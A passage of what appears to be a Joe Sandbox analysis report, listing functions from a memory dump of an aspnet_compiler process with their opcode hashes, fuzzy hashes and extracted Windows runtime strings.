                                                      • Instruction ID: fb7ea574f9c737fa09a87f272252c4be9d436976c0fae23342fe50ea42e75579
                                                      • Opcode Fuzzy Hash: acc792594d0aa02195cc2ba32a06e77cda9c261de1f587ba0e7bee7e8834caa3
                                                      • Instruction Fuzzy Hash: 9841D234A05689DBDB15DF5DC480BAE7BB8FF84700F2580E9E905DB296E375D900CB50
                                                      Function 01AEA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Cleanup Group$Threadpool!
                                                      • API String ID: 2994545307-4008356553
                                                      • Opcode ID: f178a53c8508b6396849ce7e6a3b94076d69dda2c4e7c207b0c04e25b6e263bc
                                                      • Instruction ID: 6121b32a477be357b93c3e5d798290aa0d66ee298b6ef4751f2491e841b02099
                                                      • Opcode Fuzzy Hash: f178a53c8508b6396849ce7e6a3b94076d69dda2c4e7c207b0c04e25b6e263bc
                                                      • Instruction Fuzzy Hash: 5401A9B2640700AFD321DF28CE4AB2677E8F785B25F058979F658C7190E334E804CB46
                                                      Function 01ABC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MUI
                                                      • API String ID: 0-1339004836
                                                      • Opcode ID: f921c04a401cc5712fcb9e7b91a5590e75aaa07f9f6bb08e7e8d1ec0211b2867
                                                      • Instruction ID: 853f456953d74053db2618e5837c3caaf7e14686ec99ca19febfba5ea623c67b
                                                      • Opcode Fuzzy Hash: f921c04a401cc5712fcb9e7b91a5590e75aaa07f9f6bb08e7e8d1ec0211b2867
                                                      • Instruction Fuzzy Hash: 63828D75E002988FEB25CFA9C9C0BEDBBB9BF44324F148169E919AB356D7309D41CB50
                                                      Function 01B36420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 7ece775d15b298878a19b9c4d69e59f355edc4056cee0a0beee78dd6d7888899
                                                      • Instruction ID: 290f105b2dd9f4d5980355d700ae51992a7037ca2bdcee7a3d247893205ec476
                                                      • Opcode Fuzzy Hash: 7ece775d15b298878a19b9c4d69e59f355edc4056cee0a0beee78dd6d7888899
                                                      • Instruction Fuzzy Hash: F19181B1A00619BFEB25DB94CD85FEE7BB8EF58B50F114065F601AB190D774AD04CBA0
                                                      Function 01B5E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: b03ab8b7c5d60be968e526fda11a0f6820a25845f858e80086907414e8c00075
                                                      • Instruction ID: d3b7c1d3ccba0d3791ed275e13c7d89bc1a9e26203e6462c6c8f8da0dedaf25d
                                                      • Opcode Fuzzy Hash: b03ab8b7c5d60be968e526fda11a0f6820a25845f858e80086907414e8c00075
                                                      • Instruction Fuzzy Hash: E091BE32900609AFDF2AABA5DD84FAFBBB9EF45780F000069F905A7251DB35DA01CB50
                                                      Function 01AEA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalTags
                                                      • API String ID: 0-1106856819
                                                      • Opcode ID: 504621e23c56135cf3f02c1610eb4bb4d4ee1317873551e531f762a6467d2213
                                                      • Instruction ID: cf355e40838f92b6b5725c4eac228a9e2ba2c0c6e9663231c863dae8c0ea4e74
                                                      • Opcode Fuzzy Hash: 504621e23c56135cf3f02c1610eb4bb4d4ee1317873551e531f762a6467d2213
                                                      • Instruction Fuzzy Hash: 24718EB5E0022ACFDF28CF9CD5806ADBBB1FF58700F1481AAED09AB251E7719845CB50
                                                      Function 01B54978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .mui
                                                      • API String ID: 0-1199573805
                                                      • Opcode ID: aaf5c5ec8ecf414237bf31c14109aada8171188eedce0b8f459fe8f23da7cd4f
                                                      • Instruction ID: 1cfb9b86cb72b7793fcc9fbd9cc84732af81385c3d0d81397c21a0048c43ebfc
                                                      • Opcode Fuzzy Hash: aaf5c5ec8ecf414237bf31c14109aada8171188eedce0b8f459fe8f23da7cd4f
                                                      • Instruction Fuzzy Hash: F0519472D0022A9BDF99DFA9D940BEEBBB4EF05B10F054169EE11B7240E7349841CBE4
                                                      Function 01ACE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EXT-
                                                      • API String ID: 0-1948896318
                                                      • Opcode ID: 82645b022126ec4c2c07a796354f2828102e058c52f91035212864d173748381
                                                      • Instruction ID: 7c5ba8011cfc51f20db51e287807b0cb4968f257a4eeed152e32e26045a57afd
                                                      • Opcode Fuzzy Hash: 82645b022126ec4c2c07a796354f2828102e058c52f91035212864d173748381
                                                      • Instruction Fuzzy Hash: 7C418272608342AFD721DB75C940B6FBBE8AF88B14F44092DFA84E7140EB74D908C796
                                                      Function 01B2C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      • Opcode ID: 7b96f5b0dba8ed624fadc4321c0916d5533e8b9a336c8eb214d924bf9de7a443
                                                      • Instruction ID: dd671d8eaed712fc8b1ce34c2f3bedfec897ea831a58fdf2fc16195dcb8fa81f
                                                      • Opcode Fuzzy Hash: 7b96f5b0dba8ed624fadc4321c0916d5533e8b9a336c8eb214d924bf9de7a443
                                                      • Instruction Fuzzy Hash: 8B4146B1D0052DAADF25DA50DD84FEEBB7CAB44714F0085D5E708AB140DB709E498F95
                                                      Function 01B46B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      • Opcode ID: 89371650078041977960dda71e4157f19dd4a1b8d4f3b5ac71676da5797b444c
                                                      • Instruction ID: bb1f511f699b0714348da175f92851e8826c9309b6b4365bd780e5922e0682a3
                                                      • Opcode Fuzzy Hash: 89371650078041977960dda71e4157f19dd4a1b8d4f3b5ac71676da5797b444c
                                                      • Instruction Fuzzy Hash: B5311631E007199BEB26CF69C850BAE7BA8DF06704F1480A8E941AB282D775EC45DB54
                                                      Function 01B2CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryName
                                                      • API String ID: 0-215506332
                                                      • Opcode ID: 1ffeae8ea3efd022c31a88d5030e6295cb404496f96d540a329ca9b048c3b7a4
                                                      • Instruction ID: c618241d8e903851952b8f8d22ed2a2e747ce406d1053d1f4d0685846912b770
                                                      • Opcode Fuzzy Hash: 1ffeae8ea3efd022c31a88d5030e6295cb404496f96d540a329ca9b048c3b7a4
                                                      • Instruction Fuzzy Hash: EE310536900529AFEB19DA58C959E6FBF74EF80760F0141A9EA09E7250D7309E08DBE0
                                                      Function 01B3892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01B3895E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                      • API String ID: 0-702105204
                                                      • Opcode ID: a15f5d61a7fc24d3f5f53a5d46a763df804da64a565215944c337c664187e250
                                                      • Instruction ID: f1878b856043eebcb4b664f5622951dc707c6d323c72e09293f1fcb338c88c71
                                                      • Opcode Fuzzy Hash: a15f5d61a7fc24d3f5f53a5d46a763df804da64a565215944c337c664187e250
                                                      • Instruction Fuzzy Hash: B9012632204305AFEB3D6F5ADDC4AAA7B75EFC5254B4423ACF64217152CB20B8A1C793
                                                      Function 01B52000 Relevance: .8, Instructions: 757COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d964e084fc78d7a6b7423f6a74648e87f844abbdaf6438b4b8893264f1438282
                                                      • Instruction ID: 2bde5f75e46be9f144ffba8a8e598cfe2f54146bbd38049a7424cf75cc12c2ec
                                                      • Opcode Fuzzy Hash: d964e084fc78d7a6b7423f6a74648e87f844abbdaf6438b4b8893264f1438282
                                                      • Instruction Fuzzy Hash: 3042C335609341DBEB69CF68C890B6BBBE5EF88340F0809ADFE9297250D771D845CB52
                                                      Function 01B48158 Relevance: .6, Instructions: 617COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cb837132734269a79cbab6135eec80fd9cace0513b720b5ec5615a08df2763bb
                                                      • Instruction ID: b220dc440b9acd48fcaeab0eb7d8497c61cb083067492fc0a8df9dd504f5807d
                                                      • Opcode Fuzzy Hash: cb837132734269a79cbab6135eec80fd9cace0513b720b5ec5615a08df2763bb
                                                      • Instruction Fuzzy Hash: 05422A75A002199FEB29CFA9C881BADBBF5FF48300F14C199E949EB242D7349985DF50
                                                      Function 01AC2840 Relevance: .6, Instructions: 605COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 565ad6ed84de7ac451105e03012f906c4fe2bf8f53b6d62724662a1b188fca30
                                                      • Instruction ID: a1f648c391972b698cd9eb9ad63a8909b60e136139187eb738c34091d1cd9c42
                                                      • Opcode Fuzzy Hash: 565ad6ed84de7ac451105e03012f906c4fe2bf8f53b6d62724662a1b188fca30
                                                      • Instruction Fuzzy Hash: FA321270A007558FEB29CF69C8447BEBBF2FF84700F55419EE8469B289D7B5A801CB50
                                                      Function 01B5A118 Relevance: .6, Instructions: 591COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9f6f50d74e6cadfb6eb1c5ad302456060041027c02f3ce444eb6e356c067ea3e
                                                      • Instruction ID: 7d1c06dffc3d01d318092a2d5351021022e4c462dee035a3dc9d7490caffaaa5
                                                      • Opcode Fuzzy Hash: 9f6f50d74e6cadfb6eb1c5ad302456060041027c02f3ce444eb6e356c067ea3e
                                                      • Instruction Fuzzy Hash: 6222B0702046518BEBA9CF39C091772BBF1EF45344F0886D9EE96AF286D375E452CB60
                                                      Function 01AD4A35 Relevance: .4, Instructions: 423COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                      • Instruction ID: 11557015e8c2604c8554c806c84da42bcc2d1849ecd48ac6519a1f0f8def48a1
                                                      • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                      • Instruction Fuzzy Hash: 04F19F70E0060A9BDF19CFA9C580BAEBBF5FF48710F498169E942AB754E734D841CB60
                                                      Function 01B4892B Relevance: .4, Instructions: 386COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5596878e7f22e244c4bf0ef896826d8a5c74c57c23d0d39c6b99d598af7003da
                                                      • Instruction ID: eb0ec88331f2e33e0c5eed31533986e04096767d9d49fc660e6811260cfff4c7
                                                      • Opcode Fuzzy Hash: 5596878e7f22e244c4bf0ef896826d8a5c74c57c23d0d39c6b99d598af7003da
                                                      • Instruction Fuzzy Hash: 5CD1F071A0060A9FDF09CFA9C881AFEB7F1EF88304F18C1A9D955E7241E735E9059B60
                                                      Function 01AB65D0 Relevance: .4, Instructions: 383COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5d7cc1fd82a648bbdea5b747c7dc00896bd94ea021ba1cc334d43f15d4739f88
                                                      • Instruction ID: 3e20e5671959919ec5eb80eeb46f91e709024585cf942bf8c0bb08cfb0a32252
                                                      • Opcode Fuzzy Hash: 5d7cc1fd82a648bbdea5b747c7dc00896bd94ea021ba1cc334d43f15d4739f88
                                                      • Instruction Fuzzy Hash: 1BE16D71508382CFC715CF28C5D0AAABBE4FF89314F05896DE99987352EB31E945CB92
                                                      Function 01AA8397 Relevance: .4, Instructions: 380COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 63d1ad296397b945185ac4e09dd1b08436dbbe935c5c12d9dd9ed41d15843f99
                                                      • Instruction ID: 7167a8176f0cfcca0a2e63c0427e765804ddfe719239bbb9d36daf00e0f09d1a
                                                      • Opcode Fuzzy Hash: 63d1ad296397b945185ac4e09dd1b08436dbbe935c5c12d9dd9ed41d15843f99
                                                      • Instruction Fuzzy Hash: C8D10171A002069BDB19CF68C980EBABBB5FF54305F48426DF912DB2C1EB38E950CB50
                                                      Function 01B38243 Relevance: .3, Instructions: 322COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                      • Instruction ID: 7b4e401705bb4c5dab21db36131815b0b4596489492c10b8344955b51db1e4ee
                                                      • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                      • Instruction Fuzzy Hash: 31B16374A006059FDF28DF99C980AABBBBAFFC4304F10459DBA5297790DB34E919CB11
                                                      Function 01AC0535 Relevance: .3, Instructions: 300COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                      • Instruction ID: ad717ca8d09a25d59b66fb692a78fa4cd778030c44965ba92a8ea2734db7dd1e
                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                      • Instruction Fuzzy Hash: 2FB12535600646DFDB29DBA8C950BBEBBF6EF88700F194199E6429B385D730ED41CB90
                                                      Function 01AB83C0 Relevance: .3, Instructions: 281COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 02ffbf8b2d951ceb74314e4a365921b56250157eaf294bfa5bec4bc5d286c705
                                                      • Instruction ID: cbb8e8543e58cf97fef9d1218aa772733e800db5f89f07cbcd7417a189730c70
                                                      • Opcode Fuzzy Hash: 02ffbf8b2d951ceb74314e4a365921b56250157eaf294bfa5bec4bc5d286c705
                                                      • Instruction Fuzzy Hash: 3BC148751083818FE764DF29C484BABB7E9FF88304F45496DEA8987291D778E904CF92
                                                      Function 01AAC427 Relevance: .3, Instructions: 280COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9f6f17589fd667f34e468a03b7d35c314bfd741d5d9103b0e00176e48b08b201
                                                      • Instruction ID: b5468913fed293aac6728aebba6192a747ec38ba72ee9f57d02922613a2fa6ca
                                                      • Opcode Fuzzy Hash: 9f6f17589fd667f34e468a03b7d35c314bfd741d5d9103b0e00176e48b08b201
                                                      • Instruction Fuzzy Hash: 5AB19670A002668BEB25DF68C990BA9B7F5EF44710F4485E9E54AE7285EB30DDC5CF20
                                                      Function 01ADE5E7 Relevance: .3, Instructions: 278COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 98c307b824e78cfcb9a4eda3b7115b1d3887d0583e3dec20b2c6e3e4a91e66ff
                                                      • Instruction ID: 52e2a8ca94682bf72f7d156f9fb43bcc6ee0a7ea9bbfd2321ea3d832a56a8a85
                                                      • Opcode Fuzzy Hash: 98c307b824e78cfcb9a4eda3b7115b1d3887d0583e3dec20b2c6e3e4a91e66ff
                                                      • Instruction Fuzzy Hash: 37A10731E00A199FEB26DB98C944BBEBBB4FF00714F060199EA12AB2D5D7749D44CBD1
                                                      Function 01AF0185 Relevance: .3, Instructions: 276COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a4ca6247fb058385ec507e55060d44c034a36c83bf889060db404128e9327c81
                                                      • Instruction ID: 473bbe5ca56b8cce8e5cc5fee56230615d1f04f1c6f7ea8743f4c0b8d297e1b0
                                                      • Opcode Fuzzy Hash: a4ca6247fb058385ec507e55060d44c034a36c83bf889060db404128e9327c81
                                                      • Instruction Fuzzy Hash: 1AA1A170B006269BDB25DFA9C690BAAB7B2FF54314F14412DFB4997283DB34E805CB50
                                                      Function 01B84500 Relevance: .3, Instructions: 275COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f312fcffb42e39ea510fab3a8f8cbdb40fa30e35fc0eba988345f44974f8b5f8
                                                      • Instruction ID: bed8a65f94985247f59e53c76c121fadb0a88feb35eda0f22b0eb4a42f6130ca
                                                      • Opcode Fuzzy Hash: f312fcffb42e39ea510fab3a8f8cbdb40fa30e35fc0eba988345f44974f8b5f8
                                                      • Instruction Fuzzy Hash: 8AA1DF72A14212DFC719EF18CA80B6ABBE9FF58B04F4505ADF5459B651D734EC00CB91
                                                      Function 01B82B57 Relevance: .3, Instructions: 266COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                      • Instruction ID: 158000ab35018f22ffe3d8e0337a6a991d96d355be90f518036d8c0f557be5b5
                                                      • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                      • Instruction Fuzzy Hash: E5B14771E0061ADFDF29DFA9C980AADBBB5FF48710F1481A9E914A7390D730A941CF94
                                                      Function 01B360E0 Relevance: .3, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1a2ee64800cbb5a10e2ffb8858827c51fa8bc90c9fd19062c17626ae9b78a638
                                                      • Instruction ID: eb3138def3ee3b581c25cd72cd52f59e1981fdf0badf43fc6ee695cb88d88817
                                                      • Opcode Fuzzy Hash: 1a2ee64800cbb5a10e2ffb8858827c51fa8bc90c9fd19062c17626ae9b78a638
                                                      • Instruction Fuzzy Hash: BE916371D00616BFDF19CF69D884BAEBBB5EF88710F154199E610EB241D734DA109BA0
                                                      Function 01ACE3F0 Relevance: .3, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 94fcd6c8ddc82e0ad06d60a8fe07cf597edb2eb0db6021877bfcb21a02b572db
                                                      • Instruction ID: 67e9112828d309bd240a893f4eb946070e0e589ec7191df975b454a77c956967
                                                      • Opcode Fuzzy Hash: 94fcd6c8ddc82e0ad06d60a8fe07cf597edb2eb0db6021877bfcb21a02b572db
                                                      • Instruction Fuzzy Hash: DD913671A00656CBEB28DB6CC540BBABFB2EFA4B14F0940ADED059B285EB34D901C751
                                                      Function 01B06ACC Relevance: .2, Instructions: 226COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1ccc598efc03b2e6ff109b5de3705234dd2ffbe79c1fd214967e10e007a524ee
                                                      • Instruction ID: 5f0ec4be00d843318c86c96b497800e5a78e59d50d6c6fe624dfc5f1580f42e6
                                                      • Opcode Fuzzy Hash: 1ccc598efc03b2e6ff109b5de3705234dd2ffbe79c1fd214967e10e007a524ee
                                                      • Instruction Fuzzy Hash: 8281B4B1E006169FDB29CF69C940ABEBBF9FB48700F04852EE545E7680E734D951CB94
                                                      Function 01B7AB40 Relevance: .2, Instructions: 222COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                      • Instruction ID: e2ce7ed67deeb7760dd5aedff69827ec2ca5d48fdf509c13157ee9ac356c8c93
